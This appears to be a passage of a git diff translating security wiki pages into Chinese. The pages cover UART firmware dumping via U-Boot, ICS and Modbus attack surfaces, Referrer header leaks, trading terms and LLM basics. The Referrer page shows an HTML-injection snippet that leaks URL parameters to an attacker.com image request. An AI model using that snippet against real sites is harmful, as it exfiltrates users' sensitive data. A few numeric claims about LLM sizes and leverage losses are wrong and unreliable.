- # From now on pulse enter for default
+# From now on pulse enter for default
 (1)>
 Stop bits:
- 1. 1 *default
- 2. 2
+1. 1 *default
+2. 2
 (1)>
 Receive polarity:
- 1. Idle 1 *default
- 2. Idle 0
+1. Idle 1 *default
+2. Idle 0
 (1)>
 Select output type:
- 1. Open drain (H=Hi-Z, L=GND)
- 2. Normal (H=3.3V, L=GND)
+1. Open drain (H=Hi-Z, L=GND)
+2. Normal (H=3.3V, L=GND)
 
 (1)>
 Clutch disengaged!!!
@@ -151,36 +144,30 @@ Escritura inicial completada:
 AAA Hi Dreg! AAA
 waiting a few secs to repeat....
 ```
+## 通过 UART 控制台转储固件
 
-## Dumping Firmware with UART Console
+UART 控制台提供了一种在运行时环境中处理底层固件的好方法。但是，当 UART 控制台访问为只读时，可能会引入许多限制。在许多嵌入式设备中，固件存储在 EEPROM 中，并在具有易失性内存的处理器中执行。因此，固件保持只读状态，因为制造时的原始固件就在 EEPROM 内部，任何新文件都可能因易失性内存而丢失。因此，在处理嵌入式固件时，转储固件是一项有价值的工作。
 
-UART Console provides a great way to work with the underlying firmware in runtime environment. But when the UART Console access is read-only, it might introduce a lot of constrains. In many embedded devices, the firmware is stored in EEPROMs and executed in processors that have volatile memory. Hence, the firmware is kept read-only since the original firmware during manufacturing is inside the EEPROM itself and any new files would get lost due to volatile memory. Hence, dumping firmware is a valuable effort while working with embedded firmwares.
+有很多方法可以做到这一点，SPI 部分涵盖了从 EEPROM 中直接提取固件的各种设备的方法。尽管如此，建议首先尝试通过 UART 转储固件，因为使用物理设备和外部交互转储固件可能存在风险。
 
-There are a lot of ways to do this and the SPI section covers methods to extract firmware directly from the EEPROM with various devices. Although, it is recommended to first try dumping firmware with UART since dumping firmware with physical devices and external interactions can be risky.
+从 UART 控制台转储固件需要首先获取对引导加载程序的访问权限。许多流行的供应商使用 uboot（通用引导加载程序）作为其引导加载程序来加载 Linux。因此，获取对 uboot 的访问权限是必要的。
 
-Dumping firmware from UART Console requires first getting access to bootloaders. Many popular vendors make use of uboot (Universal Bootloader) as their bootloader to load Linux. Hence, getting access to uboot is necessary.
+要访问引导加载程序，请将 UART 端口连接到计算机，并使用任何串行控制台工具，同时保持设备的电源断开。一旦设置完成，按下 Enter 键并保持不放。最后，连接设备的电源并让其启动。
 
-To get access to boot bootloader, connect the UART port to the computer and use any of the Serial Console tools and keep the power supply to the device disconnected. Once the setup is ready, press the Enter Key and hold it. Finally, connect the power supply to the device and let it boot.
-
-Doing this will interrupt uboot from loading and will provide a menu. It is recommended to understand uboot commands and using help menu to list them. This might be `help` command. Since different vendors use different configurations, it is necessary to understand each of them seperately.
-
-Usually, the command to dump the firmware is:
+这样做会中断 uboot 的加载并提供一个菜单。建议了解 uboot 命令并使用帮助菜单列出它们。这可能是 `help` 命令。由于不同的供应商使用不同的配置，因此有必要分别理解每个配置。
 
+通常，转储固件的命令是：
 ```
 md
 ```
+这代表“内存转储”。这将把内存（EEPROM 内容）转储到屏幕上。建议在开始程序之前记录串行控制台输出，以捕获内存转储。
 
-which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump.
-
-Finally, just strip out all the unnecessary data from the log file and store the file as `filename.rom` and use binwalk to extract the contents:
-
+最后，只需从日志文件中剥离所有不必要的数据，并将文件存储为 `filename.rom`，然后使用 binwalk 提取内容：
 ```
 binwalk -e <filename.rom>
 ```
+这将根据在十六进制文件中找到的签名列出 EEPROM 的可能内容。
 
-This will list the possible contents from the EEPROM as per the signatures found in the hex file.
-
-Although, it is necessary to note that it's not always the case that the uboot is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if uboot is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention uboot while booting.
+不过，需要注意的是，即使正在使用 uboot，它并不总是解锁的。如果 Enter 键没有任何反应，请检查其他键，如空格键等。如果引导加载程序被锁定且没有被中断，则此方法将无效。要检查 uboot 是否是设备的引导加载程序，请在设备启动时检查 UART 控制台上的输出。它可能在启动时提到 uboot。
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/todo/industrial-control-systems-hacking/README.md b/src/todo/industrial-control-systems-hacking/README.md
index 4075078a3..bf96a60dc 100644
--- a/src/todo/industrial-control-systems-hacking/README.md
+++ b/src/todo/industrial-control-systems-hacking/README.md
@@ -1,18 +1,15 @@
-# Industrial Control Systems Hacking 
+# 工业控制系统黑客技术
 
-## About this Section
+## 关于本节
 
-This section contains all about Industrial Control Systems including concepts as well as methodologies to hack them with various security issues that persists in them. 
+本节包含有关工业控制系统的所有内容，包括概念以及利用各种安全问题进行黑客攻击的方法论。
 
-Industrial Control Systems are everywhere, since industries are vital for economic development of a nation. But these ICS are hard to update and lesser advancements are made in this field. Hence, finding security flaws is common here. Most of the protocols and standards used here where developed back in the 90's and have much lesser capabilities as compared to current attack scenarios. 
+工业控制系统无处不在，因为工业对国家的经济发展至关重要。但这些ICS难以更新，且在该领域的进展较少。因此，发现安全漏洞在这里很常见。这里使用的大多数协议和标准是在90年代开发的，与当前的攻击场景相比，能力较弱。
 
-It has become important to secure these systems since damaging them can cost a lot and even lives at the worst case. To understand Industrial Contol Systems security, knowing the internals of them is necessary. 
-
-Since Industrial Control Systems are installed following set standards, knowing each components would help in interconnecting every other mechanisms in the control system. Installation of these devices like PLCs and SCADA systems is different is various industries, hence information gathering is critical. 
-
-Industrial Control Systems can be complicated at times and hence require a lot of patience to do anything. It's all about probing and reconnaissance before planning attacks and developing any exploits. 
-
-These techniques can also be used to protect against attacks and blue teaming for industrial control systems. 
+保护这些系统变得重要，因为破坏它们可能会造成巨大的经济损失，甚至在最坏的情况下危及生命。要理解工业控制系统的安全性，了解它们的内部结构是必要的。
 
+由于工业控制系统是按照设定标准安装的，了解每个组件将有助于将控制系统中的其他机制互联。像PLC和SCADA系统这样的设备在各个行业的安装方式不同，因此信息收集至关重要。
 
+工业控制系统有时可能会很复杂，因此在进行任何操作时需要大量的耐心。在计划攻击和开发任何漏洞之前，所有的工作都是关于探测和侦察。
 
+这些技术也可以用于保护工业控制系统免受攻击和蓝队防御。
diff --git a/src/todo/industrial-control-systems-hacking/modbus.md b/src/todo/industrial-control-systems-hacking/modbus.md
index 0bcc6aa89..7c8c350a5 100644
--- a/src/todo/industrial-control-systems-hacking/modbus.md
+++ b/src/todo/industrial-control-systems-hacking/modbus.md
@@ -1,35 +1,31 @@
-# The Modbus Protocol 
+# Modbus协议
 
-## Introduction to Modbus Protocol 
+## Modbus协议简介
 
-The Modbus protocol is a widely used protocol in Industrial Automation and Control Systems. Modbus allows communication between various devices such as programmable logic controllers (PLCs), sensors, actuators, and other industrial devices. Understanding the Modbus Protocol is essential since this is the single most used communication protocol in the ICS and has a lot of potential attack surface for sniffing and even injecting commands into PLCs.
+Modbus协议是工业自动化和控制系统中广泛使用的协议。Modbus允许可编程逻辑控制器（PLC）、传感器、执行器和其他工业设备之间的通信。理解Modbus协议至关重要，因为这是ICS中使用最广泛的通信协议，并且具有大量的潜在攻击面，可以进行嗅探甚至向PLC注入命令。
 
-Here, concepts are stated point-wise providing context of the protcol and it's nature of operation. The biggest challenge in ICS system security is the cost of implementation and upgradation. These protocols and standards where designed in the early 80s and 90s which are still widely used. Since an industry has a lot of devices and connections, upgrading devices is very difficult, which provides hackers with an edge of dealing with outdated protocols. Attacks on Modbus is like practically unevitable since it is going to be used without upgradation is it's operation is critical to the industry. 
+在这里，概念以要点形式陈述，提供协议的背景及其操作性质。ICS系统安全的最大挑战是实施和升级的成本。这些协议和标准是在80年代和90年代早期设计的，至今仍被广泛使用。由于一个行业有很多设备和连接，升级设备非常困难，这使得黑客在处理过时协议时占据了优势。对Modbus的攻击几乎是不可避免的，因为它将在没有升级的情况下使用，而其操作对行业至关重要。
 
-## The Client-Server Architecture
+## 客户端-服务器架构
 
-Modbus Protocol is typically used as in Client Server Architecture where a master device (client) initiates communication with one or more slave devices (servers). This is also referred to as Master-Slave architecture, which is widely used in electronics and IoT with SPI, I2C, etc. 
+Modbus协议通常用作客户端-服务器架构，其中主设备（客户端）与一个或多个从设备（服务器）发起通信。这也被称为主从架构，广泛用于电子和物联网中，如SPI、I2C等。
 
-## Serial and Etherent Versions
+## 串行和以太网版本
 
-Modbus Protocol is designed for both, Serial Communication as well as Ethernet Communications. The Serial Communication is widely used in legacy systems while modern devices support Ethernet which offers high data rates and is more suitable for modern industrial networks. 
+Modbus协议设计用于串行通信和以太网通信。串行通信在遗留系统中广泛使用，而现代设备支持以太网，提供更高的数据传输速率，更适合现代工业网络。
 
-## Data Representation 
+## 数据表示
 
-Data is transmitted in Modbus protocol as ASCII or Binary, although the binary format is used due to it's compactibility with older devices. 
+数据在Modbus协议中以ASCII或二进制形式传输，尽管由于与旧设备的兼容性，通常使用二进制格式。
 
-## Function Codes 
+## 功能代码
 
- ModBus Protocol works with transmission of specific function codes that are used to operate the PLCs and various control devices. This portion is important to undertstand since replay attacks can be done by retransmitting function codes. Legacy devices do not support any encryption towards data transmission and usually have long wires which connect them, which results to tampering of these wires and capturing/injected data. 
-
- ## Addressing of Modbus 
-
-Each device in the network has some unique address which is essential for communication between devices. Protocols like Modbus RTU, Modbus TCP, etc. are used to implement addressing and serves like a transport layer to the data transmission. The data that is transferred is in the Modbus protocol format that contains the message.
-
-Furthermore, Modbus also implements error checks to ensure the integrity of the transmitted data. But most of al, Modbus is a Open Standard and anyone can implement it in their devices. This made this protocol to go on global standard and it's widespread in the industrial automation industry. 
-
-Due to it's large scale use and lack of upgradations, attacking Modbus provides a significant advantage with it's attack surface. ICS is highly dependent on communication between devices and any attacks made on them can be dangerous for the operation of the industrial systems. Attacks like replay, data injection, data sniffing and leaking, Denial of Service, data forgery, etc. can be carried out if the medium of transmission is identified by the attacker. 
+ModBus协议通过传输特定的功能代码来操作PLC和各种控制设备。这部分很重要，因为重放攻击可以通过重新传输功能代码来实现。遗留设备不支持任何数据传输加密，通常有长电缆连接，这导致这些电缆被篡改并捕获/注入数据。
 
+## Modbus的寻址
 
+网络中的每个设备都有一些唯一地址，这对于设备之间的通信至关重要。像Modbus RTU、Modbus TCP等协议用于实现寻址，并作为数据传输的传输层。传输的数据是Modbus协议格式，包含消息。
 
+此外，Modbus还实现了错误检查，以确保传输数据的完整性。但最重要的是，Modbus是开放标准，任何人都可以在其设备中实现。这使得该协议成为全球标准，并在工业自动化行业中广泛应用。
 
+由于其大规模使用和缺乏升级，攻击Modbus提供了显著的优势，具有广泛的攻击面。ICS高度依赖设备之间的通信，任何对它们的攻击都可能对工业系统的操作造成危险。如果攻击者识别出传输媒介，可以进行重放、数据注入、数据嗅探和泄露、拒绝服务、数据伪造等攻击。
diff --git a/src/todo/interesting-http.md b/src/todo/interesting-http.md
index c8c86356e..58adf5b87 100644
--- a/src/todo/interesting-http.md
+++ b/src/todo/interesting-http.md
@@ -1,17 +1,16 @@
 {{#include ../banners/hacktricks-training.md}}
 
-# Referrer headers and policy
+# 引荐头和策略
 
-Referrer is the header used by browsers to indicate which was the previous page visited.
+引荐是浏览器用来指示上一个访问页面的头部。
 
-## Sensitive information leaked
+## 敏感信息泄露
 
-If at some point inside a web page any sensitive information is located on a GET request parameters, if the page contains links to external sources or an attacker is able to make/suggest (social engineering) the user visit a URL controlled by the attacker. It could be able to exfiltrate the sensitive information inside the latest GET request.
+如果在网页的某个时刻，任何敏感信息位于GET请求参数中，如果页面包含指向外部源的链接，或者攻击者能够使/建议（社会工程学）用户访问由攻击者控制的URL。它可能能够提取最新GET请求中的敏感信息。
 
-## Mitigation
-
-You can make the browser follow a **Referrer-policy** that could **avoid** the sensitive information to be sent to other web applications:
+## 缓解措施
 
+您可以让浏览器遵循一个**Referrer-policy**，以**避免**将敏感信息发送到其他Web应用程序：
 ```
 Referrer-Policy: no-referrer
 Referrer-Policy: no-referrer-when-downgrade
@@ -22,19 +21,15 @@ Referrer-Policy: strict-origin
 Referrer-Policy: strict-origin-when-cross-origin
 Referrer-Policy: unsafe-url
 ```
+## 反制措施
 
-## Counter-Mitigation
-
-You can override this rule using an HTML meta tag (the attacker needs to exploit and HTML injection):
-
+您可以使用 HTML meta 标签覆盖此规则（攻击者需要利用 HTML 注入）：
 ```markup
 <meta name="referrer" content="unsafe-url">
 <img src="https://attacker.com">
 ```
+## 防御
 
-## Defense
-
-Never put any sensitive data inside GET parameters or paths in the URL.
+永远不要将任何敏感数据放入GET参数或URL中的路径。 
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/todo/investment-terms.md b/src/todo/investment-terms.md
index fdb3bbb9f..090bfdfaf 100644
--- a/src/todo/investment-terms.md
+++ b/src/todo/investment-terms.md
@@ -1,70 +1,68 @@
-# Investment Terms
+# 投资术语
 
-## Spot
+## 现货
 
-This is the most basic way to do some trading. You can **indicate the amount of the asset and the price** that you want to buy or sell, and whenever that price is reached the operation is done.
+这是进行交易的最基本方式。您可以**指明资产的数量和您想要买入或卖出的价格**，一旦达到该价格，交易就会完成。
 
-Usually you can also use the **current market price** in order to perform the transaction as fast as possible to the current price.
+通常，您还可以使用**当前市场价格**以尽快以当前价格进行交易。
 
-**Stop Loss - Limit**: You can also indicate amount and the price of the assets to buy or sell while also indicating a lower price to buy or sell in case it's reached (to stop losses).
+**止损 - 限制**：您还可以指明买入或卖出的资产数量和价格，同时指明一个较低的价格以便在达到时买入或卖出（以止损）。
 
-## Futures
+## 期货
 
-A future is a contract where 2 parts comes to an agreement to **acquire something in the future at a fixed price**. For example to sell 1 bitcoin in 6 months at 70.000$.
+期货是一种合同，其中两方达成协议**在未来以固定价格获取某物**。例如，在6个月内以70,000美元出售1个比特币。
 
-Obviously if by 6 months the bitcoin value is 80.000$ the seller part loses money and the buying part earns it. If in 6 months the bitcoin value is 60.000$, the opposite happens.
+显然，如果到6个月时比特币的价值为80,000美元，卖方将亏损，而买方将获利。如果在6个月时比特币的价值为60,000美元，则情况正好相反。
 
-However, this is interesting for example for business which are generating a product and need to have the security that thy will be able to sell it at a price to pay the costs. Or business which want to assure fixed prices in the future for something eve if higher.
+然而，这对于例如正在生产产品并需要确保能够以支付成本的价格出售的企业来说是有趣的。或者希望确保未来某物的固定价格的企业，即使价格更高。
 
-Although in exchanges this is usually used to try to make a profit.
+尽管在交易所中，这通常用于尝试获利。
 
-* Notice that a "Long position" means that someone if betting that a price is going to increase
-* While a "short position" means that someone if betting that a price is going to go down
+* 请注意，“多头头寸”意味着某人押注价格将上涨
+* 而“空头头寸”意味着某人押注价格将下跌
 
-### Hedging With Futures <a href="#mntl-sc-block_7-0" id="mntl-sc-block_7-0"></a>
+### 使用期货对冲 <a href="#mntl-sc-block_7-0" id="mntl-sc-block_7-0"></a>
 
-If a fund manager is afraid that some stocks are going to go down he might take a short position over some assets like bitcoins or S\&P 500 futures contracts. This would be similar to buying or having some assets and create a contract of selling those at a future time at a bigger price.&#x20;
+如果基金经理担心某些股票会下跌，他可能会对一些资产（如比特币或标准普尔500期货合约）采取空头头寸。这类似于购买或持有一些资产并创建一个在未来以更高价格出售这些资产的合同。
 
-In case the price goes down the fund manager will earn benefits because he will sell the assets at a bigger price. If the price of the assets goes up the manager won't earn that benefit but he will still keep his assets.
+如果价格下跌，基金经理将获利，因为他将以更高的价格出售资产。如果资产价格上涨，经理将无法获得该收益，但他仍将保留他的资产。
 
-### Perpetual Futures
+### 永续期货
 
-**These are "futures" that will last indefinitely** (without an ending contract date). It's very common to find them for example in crypto exchanges where you can go in an out of futures based on the price of cryptos.
+**这些是“期货”，将无限期持续**（没有结束合同日期）。在加密货币交易所中，您可以根据加密货币的价格进出期货，这种情况非常常见。
 
-Notice that in these cases the benefits and lose can be in real time, if the price increases 1% you win a 1%, if the price decreases 1%, you will lose it.
+请注意，在这些情况下，收益和损失可以实时发生，如果价格上涨1%，您将赢得1%；如果价格下跌1%，您将损失1%。
 
-### Futures with Leverage
+### 带杠杆的期货
 
-**Leverage** allows you to control a larger position in the market with a smaller amount of money. It basically allows you to "bet" much more money than you have risking only the money that you actually have.
+**杠杆**允许您用较少的资金控制市场中的更大头寸。它基本上允许您“下注”比您拥有的更多资金，仅冒您实际拥有的资金的风险。
 
-For example, if you open a future position in the BTC/USDT with 100$ a 50x leverage this means that if the price is increased 1%, then you would be winning 1x50 = 50% of your initial investment (50$). And therefore you will have 150$.\
-However, if the price decreases 1%, you will lost 50% of your funds (59$ in this case). And if the price decreases 2% you will lose all your bet (2x50 = 100%).
+例如，如果您以100美元的50倍杠杆在BTC/USDT中开设期货头寸，这意味着如果价格上涨1%，您将赢得1x50 = 50%的初始投资（50美元）。因此，您将拥有150美元。\
+然而，如果价格下跌1%，您将损失50%的资金（在这种情况下为59美元）。如果价格下跌2%，您将失去所有的赌注（2x50 = 100%）。
 
-Therefore, leveraging allows to control the amount of money you bet while increasing the winnings and loses.
+因此，杠杆允许您控制您下注的资金量，同时增加收益和损失。
 
-## Differences Futures & Options
+## 期货与期权的区别
 
-The main difference between futures and options is that the contract is optional for the buyer: He can decide to execute it or not (usually he will only if he will benefit for it). The seller must sell if the buyer wants to use the option.\
-However, the buyer will be paying some fee to the seller for opening the option (so the seller, who is taking more risk aparently, starts earning some money).
+期货和期权之间的主要区别在于合同对买方是可选的：他可以决定是否执行（通常只有在他能从中获益时才会执行）。如果买方希望使用期权，卖方必须出售。\
+然而，买方将向卖方支付一些费用以开启期权（因此卖方，表面上承担更多风险，开始赚取一些钱）。
 
-### 1. **Obligation vs. Right:**
+### 1. **义务与权利：**
 
-* **Futures:** When you buy or sell a futures contract, you're entering a **binding agreement** to buy or sell an asset at a specific price on a future date. Both the buyer and the seller are **obligated** to fulfill the contract at expiration (unless the contract is closed before then).
-* **Options:** With options, you have the **right, but not the obligation**, to buy (in the case of a **call option**) or sell (in the case of a **put option**) an asset at a specific price before or at a certain expiration date. The **buyer** has the option to execute, while the **seller** is obligated to fulfill the trade if the buyer decides to exercise the option.
+* **期货：** 当您买入或卖出期货合同时，您正在进入一个**具有约束力的协议**，以在未来某个日期以特定价格买入或卖出资产。买方和卖方都**有义务**在到期时履行合同（除非合同在此之前关闭）。
+* **期权：** 通过期权，您有**权利，但没有义务**，在特定价格之前或在某个到期日以特定价格买入（在**看涨期权**的情况下）或卖出（在**看跌期权**的情况下）资产。**买方**有选择执行的权利，而**卖方**在买方决定行使期权时有义务完成交易。
 
-### 2. **Risk:**
+### 2. **风险：**
 
-* **Futures:** Both the buyer and the seller take on **unlimited risk** because they are obligated to complete the contract. The risk is the difference between the agreed-upon price and the market price at the expiration date.
-* **Options:** The buyer’s risk is limited to the **premium** paid to purchase the option. If the market doesn't move in favor of the option holder, they can simply let the option expire. However, the **seller** (writer) of the option has unlimited risk if the market moves significantly against them.
+* **期货：** 买方和卖方都承担**无限风险**，因为他们有义务完成合同。风险是到期时约定价格与市场价格之间的差额。
+* **期权：** 买方的风险仅限于为购买期权支付的**权利金**。如果市场没有朝着期权持有者有利的方向移动，他们可以简单地让期权到期。然而，期权的**卖方**（写手）在市场大幅不利于他们时面临无限风险。
 
-### 3. **Cost:**
+### 3. **成本：**
 
-* **Futures:** There is no upfront cost beyond the margin required to hold the position, as the buyer and seller are both obligated to complete the trade.
-* **Options:** The buyer must pay an **option premium** upfront for the right to exercise the option. This premium is essentially the cost of the option.
-
-### 4. **Profit Potential:**
-
-* **Futures:** The profit or loss is based on the difference between the market price at expiration and the agreed-upon price in the contract.
-* **Options:** The buyer profits when the market moves favorably beyond the strike price by more than the premium paid. The seller profits by keeping the premium if the option is not exercised.
+* **期货：** 除了持有头寸所需的保证金外，没有其他前期成本，因为买方和卖方都有义务完成交易。
+* **期权：** 买方必须为行使期权的权利提前支付**期权权利金**。这个权利金本质上是期权的成本。
 
+### 4. **利润潜力：**
 
+* **期货：** 利润或损失基于到期时市场价格与合同中约定价格之间的差额。
+* **期权：** 当市场在超过支付的权利金的行使价格的方向上有利移动时，买方获利。如果期权未被行使，卖方通过保留权利金获利。
diff --git a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
index 64317434b..0f8a860b3 100644
--- a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
+++ b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md
@@ -1,61 +1,58 @@
-# 0. Basic LLM Concepts
+# 0. 基本 LLM 概念
 
-## Pretraining
+## 预训练
 
-Pretraining is the foundational phase in developing a large language model (LLM) where the model is exposed to vast and diverse amounts of text data. During this stage, **the LLM learns the fundamental structures, patterns, and nuances of language**, including grammar, vocabulary, syntax, and contextual relationships. By processing this extensive data, the model acquires a broad understanding of language and general world knowledge. This comprehensive base enables the LLM to generate coherent and contextually relevant text. Subsequently, this pretrained model can undergo fine-tuning, where it is further trained on specialized datasets to adapt its capabilities for specific tasks or domains, enhancing its performance and relevance in targeted applications.
+预训练是开发大型语言模型（LLM）的基础阶段，在此阶段，模型接触到大量多样的文本数据。在此阶段，**LLM 学习语言的基本结构、模式和细微差别**，包括语法、词汇、句法和上下文关系。通过处理这些广泛的数据，模型获得了对语言和一般世界知识的广泛理解。这一全面的基础使 LLM 能够生成连贯且上下文相关的文本。随后，这个预训练模型可以进行微调，进一步在专业数据集上进行训练，以适应其在特定任务或领域的能力，从而提高其在目标应用中的性能和相关性。
 
-## Main LLM components
+## 主要 LLM 组件
 
-Usually a LLM is characterised for the configuration used to train it. This are the common components when training a LLM:
+通常，LLM 的特征是用于训练的配置。这些是训练 LLM 时的常见组件：
 
-- **Parameters**: Parameters are the **learnable weights and biases** in the neural network. These are the numbers that the training process adjusts to minimize the loss function and improve the model's performance on the task. LLMs usually use millions of parameters.
-- **Context Length**: This is the maximum length of each sentence used to pre-train the LLM.
-- **Embedding Dimension**: The size of the vector used to represent each token or word. LLMs usually sue billions of dimensions.
-- **Hidden Dimension**: The size of the hidden layers in the neural network.
-- **Number of Layers (Depth)**: How many layers the model has. LLMs usually use tens of layers.
-- **Number of Attention Heads**: In transformer models, this is how many separate attention mechanisms are used in each layer. LLMs usually use tens of heads.
-- **Dropout**: Dropout is something like the percentage of data that is removed (probabilities turn to 0) during training used to **prevent overfitting.** LLMs usually use between 0-20%.
-
-Configuration of the GPT-2 model:
+- **参数**：参数是神经网络中的**可学习权重和偏差**。这些是训练过程调整以最小化损失函数并提高模型在任务上表现的数字。LLM 通常使用数百万个参数。
+- **上下文长度**：这是用于预训练 LLM 的每个句子的最大长度。
+- **嵌入维度**：用于表示每个标记或单词的向量大小。LLM 通常使用数十亿的维度。
+- **隐藏维度**：神经网络中隐藏层的大小。
+- **层数（深度）**：模型的层数。LLM 通常使用数十层。
+- **注意力头数**：在变换器模型中，这是每层中使用的独立注意力机制的数量。LLM 通常使用数十个头。
+- **丢弃率**：丢弃率类似于在训练过程中移除的数据百分比（概率变为 0），用于**防止过拟合。** LLM 通常使用 0-20% 之间的值。
 
+GPT-2 模型的配置：
 ```json
 GPT_CONFIG_124M = {
-    "vocab_size": 50257,  // Vocabulary size of the BPE tokenizer
-    "context_length": 1024, // Context length
-    "emb_dim": 768,       // Embedding dimension
-    "n_heads": 12,        // Number of attention heads
-    "n_layers": 12,       // Number of layers
-    "drop_rate": 0.1,     // Dropout rate: 10%
-    "qkv_bias": False     // Query-Key-Value bias
+"vocab_size": 50257,  // Vocabulary size of the BPE tokenizer
+"context_length": 1024, // Context length
+"emb_dim": 768,       // Embedding dimension
+"n_heads": 12,        // Number of attention heads
+"n_layers": 12,       // Number of layers
+"drop_rate": 0.1,     // Dropout rate: 10%
+"qkv_bias": False     // Query-Key-Value bias
 }
 ```
-
 ## Tensors in PyTorch
 
-In PyTorch, a **tensor** is a fundamental data structure that serves as a multi-dimensional array, generalizing concepts like scalars, vectors, and matrices to potentially higher dimensions. Tensors are the primary way data is represented and manipulated in PyTorch, especially in the context of deep learning and neural networks.
+在 PyTorch 中，**tensor** 是一种基本数据结构，作为多维数组，推广了标量、向量和矩阵等概念到更高的维度。张量是数据在 PyTorch 中表示和操作的主要方式，特别是在深度学习和神经网络的背景下。
 
 ### Mathematical Concept of Tensors
 
-- **Scalars**: Tensors of rank 0, representing a single number (zero-dimensional). Like: 5
-- **Vectors**: Tensors of rank 1, representing a one-dimensional array of numbers. Like: \[5,1]
-- **Matrices**: Tensors of rank 2, representing two-dimensional arrays with rows and columns. Like: \[\[1,3], \[5,2]]
-- **Higher-Rank Tensors**: Tensors of rank 3 or more, representing data in higher dimensions (e.g., 3D tensors for color images).
+- **Scalars**: 0 阶张量，表示一个数字（零维）。例如：5
+- **Vectors**: 1 阶张量，表示一维数字数组。例如：\[5,1]
+- **Matrices**: 2 阶张量，表示具有行和列的二维数组。例如：\[\[1,3], \[5,2]]
+- **Higher-Rank Tensors**: 3 阶或更高阶的张量，表示更高维度的数据（例如，3D 张量用于彩色图像）。
 
 ### Tensors as Data Containers
 
-From a computational perspective, tensors act as containers for multi-dimensional data, where each dimension can represent different features or aspects of the data. This makes tensors highly suitable for handling complex datasets in machine learning tasks.
+从计算的角度来看，张量充当多维数据的容器，其中每个维度可以表示数据的不同特征或方面。这使得张量非常适合处理机器学习任务中的复杂数据集。
 
 ### PyTorch Tensors vs. NumPy Arrays
 
-While PyTorch tensors are similar to NumPy arrays in their ability to store and manipulate numerical data, they offer additional functionalities crucial for deep learning:
+虽然 PyTorch 张量在存储和操作数值数据的能力上与 NumPy 数组相似，但它们提供了深度学习所需的额外功能：
 
-- **Automatic Differentiation**: PyTorch tensors support automatic calculation of gradients (autograd), which simplifies the process of computing derivatives required for training neural networks.
-- **GPU Acceleration**: Tensors in PyTorch can be moved to and computed on GPUs, significantly speeding up large-scale computations.
+- **Automatic Differentiation**: PyTorch 张量支持自动计算梯度（autograd），简化了训练神经网络所需的导数计算过程。
+- **GPU Acceleration**: PyTorch 中的张量可以移动到 GPU 上进行计算，显著加快大规模计算的速度。
 
 ### Creating Tensors in PyTorch
 
-You can create tensors using the `torch.tensor` function:
-
+您可以使用 `torch.tensor` 函数创建张量：
 ```python
 pythonCopy codeimport torch
 
@@ -67,114 +64,108 @@ tensor1d = torch.tensor([1, 2, 3])
 
 # Matrix (2D tensor)
 tensor2d = torch.tensor([[1, 2],
-                         [3, 4]])
+[3, 4]])
 
 # 3D Tensor
 tensor3d = torch.tensor([[[1, 2], [3, 4]],
-                         [[5, 6], [7, 8]]])
+[[5, 6], [7, 8]]])
 ```
+### 张量数据类型
 
-### Tensor Data Types
-
-PyTorch tensors can store data of various types, such as integers and floating-point numbers.&#x20;
-
-You can check a tensor's data type using the `.dtype` attribute:
+PyTorch 张量可以存储各种类型的数据，例如整数和浮点数。&#x20;
 
+您可以使用 `.dtype` 属性检查张量的数据类型：
 ```python
 tensor1d = torch.tensor([1, 2, 3])
 print(tensor1d.dtype)  # Output: torch.int64
 ```
+- 从 Python 整数创建的张量类型为 `torch.int64`。
+- 从 Python 浮点数创建的张量类型为 `torch.float32`。
 
-- Tensors created from Python integers are of type `torch.int64`.
-- Tensors created from Python floats are of type `torch.float32`.
-
-To change a tensor's data type, use the `.to()` method:
-
+要更改张量的数据类型，请使用 `.to()` 方法：
 ```python
 float_tensor = tensor1d.to(torch.float32)
 print(float_tensor.dtype)  # Output: torch.float32
 ```
+### 常见的张量操作
 
-### Common Tensor Operations
+PyTorch 提供了多种操作来处理张量：
 
-PyTorch provides a variety of operations to manipulate tensors:
+- **访问形状**：使用 `.shape` 获取张量的维度。
 
-- **Accessing Shape**: Use `.shape` to get the dimensions of a tensor.
+```python
+print(tensor2d.shape)  # 输出: torch.Size([2, 2])
+```
 
-  ```python
-  print(tensor2d.shape)  # Output: torch.Size([2, 2])
-  ```
+- **重塑张量**：使用 `.reshape()` 或 `.view()` 改变形状。
 
-- **Reshaping Tensors**: Use `.reshape()` or `.view()` to change the shape.
+```python
+reshaped = tensor2d.reshape(4, 1)
+```
 
-  ```python
-  reshaped = tensor2d.reshape(4, 1)
-  ```
+- **转置张量**：使用 `.T` 转置 2D 张量。
 
-- **Transposing Tensors**: Use `.T` to transpose a 2D tensor.
+```python
+transposed = tensor2d.T
+```
 
-  ```python
-  transposed = tensor2d.T
-  ```
+- **矩阵乘法**：使用 `.matmul()` 或 `@` 运算符。
 
-- **Matrix Multiplication**: Use `.matmul()` or the `@` operator.
+```python
+result = tensor2d @ tensor2d.T
+```
 
-  ```python
-  result = tensor2d @ tensor2d.T
-  ```
+### 在深度学习中的重要性
 
-### Importance in Deep Learning
+张量在 PyTorch 中对于构建和训练神经网络至关重要：
 
-Tensors are essential in PyTorch for building and training neural networks:
+- 它们存储输入数据、权重和偏差。
+- 它们促进训练算法中前向和后向传播所需的操作。
+- 通过 autograd，张量使得梯度的自动计算成为可能，从而简化优化过程。
 
-- They store input data, weights, and biases.
-- They facilitate operations required for forward and backward passes in training algorithms.
-- With autograd, tensors enable automatic computation of gradients, streamlining the optimization process.
+## 自动微分
 
-## Automatic Differentiation
+自动微分（AD）是一种计算技术，用于高效且准确地 **评估函数的导数（梯度）**。在神经网络的上下文中，AD 使得计算 **优化算法如梯度下降** 所需的梯度成为可能。PyTorch 提供了一个名为 **autograd** 的自动微分引擎，简化了这个过程。
 
-Automatic differentiation (AD) is a computational technique used to **evaluate the derivatives (gradients)** of functions efficiently and accurately. In the context of neural networks, AD enables the calculation of gradients required for **optimization algorithms like gradient descent**. PyTorch provides an automatic differentiation engine called **autograd** that simplifies this process.
+### 自动微分的数学解释
 
-### Mathematical Explanation of Automatic Differentiation
+**1. 链式法则**
 
-**1. The Chain Rule**
+自动微分的核心是微积分中的 **链式法则**。链式法则指出，如果你有一个函数的复合，复合函数的导数是组成函数导数的乘积。
 
